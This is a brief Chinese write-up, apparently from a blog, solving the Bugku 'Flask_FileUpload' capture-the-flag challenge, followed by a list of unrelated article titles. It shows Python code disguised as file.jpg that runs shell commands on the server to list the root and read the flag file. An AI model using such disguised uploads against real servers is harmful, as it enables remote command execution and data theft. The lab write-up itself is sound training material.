Bugku-web-Flask_FileUpload

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
相关推荐
张拭心1 小时前
技术管理笔记:让我“燃尽”的一天
前端
鹿鸣天涯2 小时前
kali 2026.2 2026年第二个版本发布-新增 9 款工具并优化虚拟机启动性能
安全·web安全·kali
不好听6132 小时前
BFF 架构实战:从前端直调 API 到加入中间层
前端·架构
不好听6132 小时前
前端跨域完全指南:从为什么报错到三种解决方案
前端
三8442 小时前
路由策略/控制 配置双点双向路由重发布
服务器·前端·javascript
无忧智库2 小时前
中大型企业整体网络安全解决方案:从“边界防火墙”到安全运营闭环(PPT)
安全·web安全
Qimooidea3 小时前
祁木 CAD Translator 工程图纸出海实战指南
服务器·前端·安全
小林ixn3 小时前
从BFF到SSE:我在Vue项目里藏了个“AI翻译官”
前端·vue.js·vite
梅雅达编程笔记3 小时前
编程启蒙|Scratch 转 Python 系列第9天:字典/哈希表积木双向对照(AI大模型参数配置表实战)
开发语言·人工智能·python·numpy·pandas
zhz52144 小时前
GIS项目中空间参考转换与MBTiles偏移:问题成因、解法与避坑
python·vue·gis